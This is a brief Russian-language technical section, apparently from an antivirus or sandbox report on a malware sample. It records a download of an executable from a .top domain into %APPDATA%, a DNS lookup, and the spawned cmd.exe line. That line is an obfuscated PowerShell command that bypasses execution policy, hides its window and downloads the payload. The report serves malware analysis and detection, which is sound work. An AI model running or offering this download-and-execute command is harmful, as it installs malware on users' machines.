Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powershELL.EXe -ExEcutIonpOliCY ByPASs -nOProFIle -WiNDOwStYLe hIdden (new-oBject sYSteM.net.WeBCLIEnT).dOwnloaDfile('http://www.basopoew.top/read.php?f=1.gif','%APPDATA%.eXe...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /c "powershELL.EXe -ExEcutIonpOliCY ByPASs -nOProFIle -WiNDOwStYLe hIdden (new-oBject sYSteM.net.WeBCLIEnT).dOwnloaDfile('http://www.basopoew.top/read.php?f=1.gif','%APPDATA%.eXe...' (со скрытым окном)